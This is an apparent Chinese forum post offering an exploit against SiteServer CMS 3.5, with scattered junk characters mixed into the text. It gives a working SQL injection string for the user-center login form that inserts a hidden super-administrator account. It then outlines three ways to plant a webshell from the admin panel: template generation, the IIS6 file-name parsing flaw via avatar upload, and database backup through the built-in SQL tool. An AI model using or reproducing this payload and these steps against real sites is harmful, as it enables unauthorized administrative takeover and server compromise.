经测试秒杀最新的3.5版
V/ @# |- y4 l, m N& p2 |5 @0 x2 |7 ?& f
stieserver官网:www.siteserver.cn1 o, I7 d! M6 c) S$ @& u0 M
/ d% s3 W5 j: m& Z6 Y# ~3 `- e
$ [" |1 a$ l% H: t3 X
' l/ n6 m4 {+ u0 {6 B! WEXP:: _3 K- I* j8 X$ m
) J& q" _, ]* a6 y; g直接访问UserCenter/login.aspx
) H& Y/ ^/ b( a& W W6 q" J/ W& a5 @7 K; E
2 t* I- {$ R" c# o. n: w
$ c9 B0 r$ {9 ^用户名处输入:
; Z* A/ M! y( {) h$ @3 Y! w8 B; K$ J
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
2 q4 r( I" d2 \
' p$ w; O9 ~9 D% I; x f1 m
7 ^# |" Y3 v% A( W x# L! j0 `( B/ z0 j u
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。& k" S! O2 P" ^
! Q: v7 |8 c, D
1 A$ e$ z& T' u+ R' t" V1 t
- c. H$ k; m; a- g之后再访问后台SiteServer/login.aspx用插入的用户登陆
9 f, E9 C$ h; o0 g0 r; `" O7 m/ U6 \( j/ h+ d
" E6 {" B" s- [
K7 q7 i" R8 K u4 T% G1 C3 Q$ y
后台拿webshell的三种方法:, ?( e3 t- ]. E
8 E7 T" a' \, h0 ?2 B. j一、& L7 L& W& S3 H6 O7 M5 i- j v
1 I2 b; z, w9 w" R
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
& j! B1 G3 D' c( D9 O' i
2 | \( K0 r8 k二、# G' Z. p; G9 t0 o
/ B/ a+ K4 ?0 S3 T3 U+ K4 [成员权限-》添加用户-》用户名为:1.asp
# j0 ^. C( w3 @8 D, ~
2 }* o$ i7 ]; z5 [3 V& C; `http://127.0.0.1/usercenter/$ X8 J0 F: `' }9 I F6 f
7 e! D, u! A& L% C3 K' c6 {
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
6 ^) N' i5 P3 c8 E, A2 X L& W2 o2 Y, ?" i& U8 P
(ps:后台添加用户时不会验证是否含有非法字符)
- y- J. Z, b. `/ K6 u; J. L7 V8 q" l9 q) C
三、
& Z( A2 |& [" d
. e) M) w9 U8 y& r- f系统工具-》实用工具-》机器参数查看
- h# x0 ]4 m8 G; E% u& M. \( e可以看到数据库类型、名称,WEB路径
- R7 w% u4 _8 R1 `( @8 x) d# C) s/ A8 O4 c7 i
系统工具-》数据库工具-》SQL语句查询
$ y. g$ l0 L7 R' K. X5 x% b这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
$ W! m) P3 m+ R- {( D4 H/ b
2 } G! l* P1 ~1 e3 V" w' C( W |